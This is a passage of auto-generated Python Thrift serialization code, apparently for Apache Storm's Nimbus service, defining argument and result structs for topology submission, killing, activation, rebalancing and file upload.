oprot.trans.flush()
# HELPER FUNCTIONS AND STRUCTURES
class submitTopology_args:
"""
Attributes:
- name
- uploadedJarLocation
- jsonConf
- topology
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
(2, TType.STRING, 'uploadedJarLocation', None, None, ), # 2
(3, TType.STRING, 'jsonConf', None, None, ), # 3
(4, TType.STRUCT, 'topology', (StormTopology, StormTopology.thrift_spec), None, ), # 4
)
def __init__(self, name=None, uploadedJarLocation=None, jsonConf=None, topology=None,):
self.name = name
self.uploadedJarLocation = uploadedJarLocation
self.jsonConf = jsonConf
self.topology = topology
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.uploadedJarLocation = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.jsonConf = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRUCT:
self.topology = StormTopology()
self.topology.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('submitTopology_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
if self.uploadedJarLocation is not None:
oprot.writeFieldBegin('uploadedJarLocation', TType.STRING, 2)
oprot.writeString(self.uploadedJarLocation)
oprot.writeFieldEnd()
if self.jsonConf is not None:
oprot.writeFieldBegin('jsonConf', TType.STRING, 3)
oprot.writeString(self.jsonConf)
oprot.writeFieldEnd()
if self.topology is not None:
oprot.writeFieldBegin('topology', TType.STRUCT, 4)
self.topology.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class submitTopology_result:
"""
Attributes:
- e
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (AlreadyAliveException, AlreadyAliveException.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'ite', (InvalidTopologyException, InvalidTopologyException.thrift_spec), None, ), # 2
)
def __init__(self, e=None, ite=None,):
self.e = e
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = AlreadyAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.ite = InvalidTopologyException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('submitTopology_result')
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
if self.ite is not None:
oprot.writeFieldBegin('ite', TType.STRUCT, 2)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class submitTopologyWithOpts_args:
"""
Attributes:
- name
- uploadedJarLocation
- jsonConf
- topology
- options
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
(2, TType.STRING, 'uploadedJarLocation', None, None, ), # 2
(3, TType.STRING, 'jsonConf', None, None, ), # 3
(4, TType.STRUCT, 'topology', (StormTopology, StormTopology.thrift_spec), None, ), # 4
(5, TType.STRUCT, 'options', (SubmitOptions, SubmitOptions.thrift_spec), None, ), # 5
)
def __init__(self, name=None, uploadedJarLocation=None, jsonConf=None, topology=None, options=None,):
self.name = name
self.uploadedJarLocation = uploadedJarLocation
self.jsonConf = jsonConf
self.topology = topology
self.options = options
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.uploadedJarLocation = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.STRING:
self.jsonConf = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 4:
if ftype == TType.STRUCT:
self.topology = StormTopology()
self.topology.read(iprot)
else:
iprot.skip(ftype)
elif fid == 5:
if ftype == TType.STRUCT:
self.options = SubmitOptions()
self.options.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('submitTopologyWithOpts_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
if self.uploadedJarLocation is not None:
oprot.writeFieldBegin('uploadedJarLocation', TType.STRING, 2)
oprot.writeString(self.uploadedJarLocation)
oprot.writeFieldEnd()
if self.jsonConf is not None:
oprot.writeFieldBegin('jsonConf', TType.STRING, 3)
oprot.writeString(self.jsonConf)
oprot.writeFieldEnd()
if self.topology is not None:
oprot.writeFieldBegin('topology', TType.STRUCT, 4)
self.topology.write(oprot)
oprot.writeFieldEnd()
if self.options is not None:
oprot.writeFieldBegin('options', TType.STRUCT, 5)
self.options.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class submitTopologyWithOpts_result:
"""
Attributes:
- e
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (AlreadyAliveException, AlreadyAliveException.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'ite', (InvalidTopologyException, InvalidTopologyException.thrift_spec), None, ), # 2
)
def __init__(self, e=None, ite=None,):
self.e = e
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = AlreadyAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.ite = InvalidTopologyException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('submitTopologyWithOpts_result')
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
if self.ite is not None:
oprot.writeFieldBegin('ite', TType.STRUCT, 2)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class killTopology_args:
"""
Attributes:
- name
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
)
def __init__(self, name=None,):
self.name = name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('killTopology_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class killTopology_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('killTopology_result')
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class killTopologyWithOpts_args:
"""
Attributes:
- name
- options
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
(2, TType.STRUCT, 'options', (KillOptions, KillOptions.thrift_spec), None, ), # 2
)
def __init__(self, name=None, options=None,):
self.name = name
self.options = options
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.options = KillOptions()
self.options.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('killTopologyWithOpts_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
if self.options is not None:
oprot.writeFieldBegin('options', TType.STRUCT, 2)
self.options.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class killTopologyWithOpts_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('killTopologyWithOpts_result')
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class activate_args:
"""
Attributes:
- name
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
)
def __init__(self, name=None,):
self.name = name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('activate_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class activate_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('activate_result')
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deactivate_args:
"""
Attributes:
- name
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
)
def __init__(self, name=None,):
self.name = name
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deactivate_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class deactivate_result:
"""
Attributes:
- e
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
)
def __init__(self, e=None,):
self.e = e
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('deactivate_result')
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class rebalance_args:
"""
Attributes:
- name
- options
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'name', None, None, ), # 1
(2, TType.STRUCT, 'options', (RebalanceOptions, RebalanceOptions.thrift_spec), None, ), # 2
)
def __init__(self, name=None, options=None,):
self.name = name
self.options = options
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.name = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.options = RebalanceOptions()
self.options.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('rebalance_args')
if self.name is not None:
oprot.writeFieldBegin('name', TType.STRING, 1)
oprot.writeString(self.name)
oprot.writeFieldEnd()
if self.options is not None:
oprot.writeFieldBegin('options', TType.STRUCT, 2)
self.options.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class rebalance_result:
"""
Attributes:
- e
- ite
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'e', (NotAliveException, NotAliveException.thrift_spec), None, ), # 1
(2, TType.STRUCT, 'ite', (InvalidTopologyException, InvalidTopologyException.thrift_spec), None, ), # 2
)
def __init__(self, e=None, ite=None,):
self.e = e
self.ite = ite
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.e = NotAliveException()
self.e.read(iprot)
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.ite = InvalidTopologyException()
self.ite.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('rebalance_result')
if self.e is not None:
oprot.writeFieldBegin('e', TType.STRUCT, 1)
self.e.write(oprot)
oprot.writeFieldEnd()
if self.ite is not None:
oprot.writeFieldBegin('ite', TType.STRUCT, 2)
self.ite.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class beginFileUpload_args:
thrift_spec = (
)
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('beginFileUpload_args')
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class beginFileUpload_result:
"""
Attributes:
- success
"""
thrift_spec = (
(0, TType.STRING, 'success', None, None, ), # 0
)
def __init__(self, success=None,):
self.success = success
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRING:
self.success = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('beginFileUpload_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRING, 0)
oprot.writeString(self.success)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class uploadChunk_args:
"""
Attributes:
- location
- chunk
"""
thrift_spec = (
None, # 0
(1, TType.STRING, 'location', None, None, ), # 1
(2, TType.STRING, 'chunk', None, None, ), # 2
)
def __init__(self, location=None, chunk=None,):
self.location = location
self.chunk = chunk
def read(self, iprot):
if iprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None and fastbinary is not None:
fastbinary.decode_binary(self, iprot.trans, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRING:
self.location = iprot.readString();
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRING:
self.chunk = iprot.readString();
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot.__class__ == TBinaryProtocol.TBinaryProtocolAccelerated and self.thrift_spec is not None and fastbinary is not None:
oprot.trans.write(fastbinary.encode_binary(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('uploadChunk_args')
if self.location is not None:
oprot.writeFieldBegin('location', TType.STRING, 1)
oprot.writeString(self.location)
oprot.writeFieldEnd()
if self.chunk is not None:
oprot.writeFieldBegin('chunk', TType.STRING, 2)
oprot.writeString(self.chunk)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.iteritems()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class uploadChunk_result:
